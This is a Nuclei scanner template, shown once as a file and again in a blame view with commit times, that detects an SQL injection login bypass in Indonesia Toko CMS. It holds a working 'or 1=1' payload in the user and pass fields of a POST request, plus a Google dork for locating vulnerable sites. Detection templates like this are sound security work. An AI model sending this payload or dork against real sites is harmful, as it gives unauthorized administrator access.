nuclei-templates/http/vulnerabilities/other/indonasia-toko-cms-sql.yaml

id: indonasia-toko-cms-sql

info:
  name: Indonasia Toko CMS - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code.
  reference:
    - https://cxsecurity.com/issue/WLB-2019030008
  metadata:
    max-request: 1
    verified: true
    google-query: inurl:"index.php?mnu=login"
  tags: sqli,toko,cms

http:
  - raw:
      - |
        POST /kinerja-alumni/index.php?mnu=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert('Administrator"

      - type: status
        status:
          - 200
templates added 2023-10-17 07:20:28 +00:00			`id: indonasia-toko-cms-sql`

			`info:`
fixed errors 2023-10-17 08:16:05 +00:00			`name: Indonasia Toko CMS - SQL Injection`
templates added 2023-10-17 07:20:28 +00:00			`author: r3Y3r53`
			`severity: high`
			`description: \|`
			`Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code.`
			`reference:`
			`- https://cxsecurity.com/issue/WLB-2019030008`
			`metadata:`
			`max-request: 1`
			`verified: true`
			`google-query: inurl:"index.php?mnu=login"`
			`tags: sqli,toko,cms`

			`http:`
			`- raw:`
			`- \|`
			`POST /kinerja-alumni/index.php?mnu=login HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
fixed errors 2023-10-17 08:16:05 +00:00
templates added 2023-10-17 07:20:28 +00:00			`user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "alert('Administrator"`

			`- type: status`
			`status:`
			`- 200`